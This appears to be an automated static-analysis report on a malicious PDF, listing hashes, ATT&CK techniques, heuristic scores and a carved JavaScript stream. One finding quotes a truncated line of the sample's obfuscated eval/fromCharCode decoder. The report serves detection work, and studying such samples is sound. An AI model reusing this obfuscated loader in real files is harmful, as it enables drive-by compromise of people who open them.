Malicious PDF — malware analysis report

Static analysis result for SHA-256 033af66b2c3ab3f6…

MALICIOUS

PDF

2.8 KB First seen: 2026-05-08
MD5: 5583d9ee85fb546024c8625d5aa887cb SHA-1: 7145df2707b4d75ef78213d6bddf300bfcf3a170 SHA-256: 033af66b2c3ab3f6d1288be4d49f94ffaf900885c5986832eef5ee7951bbfb97
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

This PDF file contains embedded JavaScript with obfuscation and eval() calls, strongly indicating malicious intent. The heuristics suggest it's part of a known exploit cluster targeting PDF vulnerabilities. The primary function appears to be the execution of this JavaScript, which likely downloads and executes a secondary payload, a common technique for initial compromise.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function Q6Ot35r(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function WhOIIUN(XVVzxYjB){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(XVVzxYjB)"+";"+"}");eval("function fq4GFyK(NGW7SUeP){var AJeF6saV="+"0,VFebDqbJfP64=NGW7SUeP.l"+"en"+"gth,HHF2XV1r7M9dSb=10"+"2"+"4,Y1OsG3,ss5nYUtct,c0tQetIlFQPh2='',Y3vgJy0nqEaPi=AJeF6saV,McLul=AJeF6saV,EQ9dBN4b=AJeF6saV,e9u95=Ar"+"ra"+"y(63,1,54,36,31,13,41,38,53,7,0,0,0 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
stream_001_off0000039c.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x39C 4057 bytes
SHA-256: 20cfc6214d0f3cd44ce78c627566651403e5802dbd80c973a2136b526853755e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). 89 of 140 identifiers look randomly generated (e.g. 'PNJ6cBKvPNJ6cER6PNd2ran6PNd6cQ56PNf6cBR6'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.